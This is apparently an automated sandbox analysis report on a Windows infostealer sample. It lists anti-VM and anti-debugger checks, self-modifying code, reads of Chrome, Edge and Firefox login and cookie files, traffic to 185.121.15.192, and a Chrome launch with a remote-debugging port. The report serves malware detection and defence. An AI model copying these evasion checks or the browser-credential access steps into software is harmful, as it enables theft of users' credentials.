Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A1B second address: 6DE0A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD5E9559C7Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A33 second address: 6DE0A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A39 second address: 6DE0A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A4A second address: 6DE0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD5E912D9F8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A6F second address: 6DE0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD5E9559C86h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A9D second address: 6DE0AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0AA1 second address: 6DE0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E30911 second address: 6E30917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E30917 second address: 6E30950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD5E9559C83h 0x00000011 call 00007FD5E9559C88h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: 94FA4C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: AF78E1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: 94D656 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: AF6072 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: B7FC03 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1182 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1180 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1242 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3174 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6825 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5692 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5692 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5484 Thread sleep count: 1182 > 30 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5484 Thread sleep time: -2365182s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2336 Thread sleep count: 1180 > 30 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2336 Thread sleep time: -2361180s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2292 Thread sleep count: 1242 > 30 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2292 Thread sleep time: -2485242s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep count: 3174 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep time: -317400s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep count: 6825 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep time: -682500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: nRYpZg6i5E.exe, 00000000.00000003.1475317140.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863882160.000002108C558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: nRYpZg6i5E.exe, 00000000.00000003.1479119011.00000000066D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'-`
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: NTICE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: SICE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: SIWVID
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00968230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00968230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0096116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_0096116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_009611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_009611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00961160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_00961160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_009613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_009613C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEC84D0 cpuid 9_2_6BEC84D0
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 9.2.service123.exe.6be40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 1204, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.11:49707 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs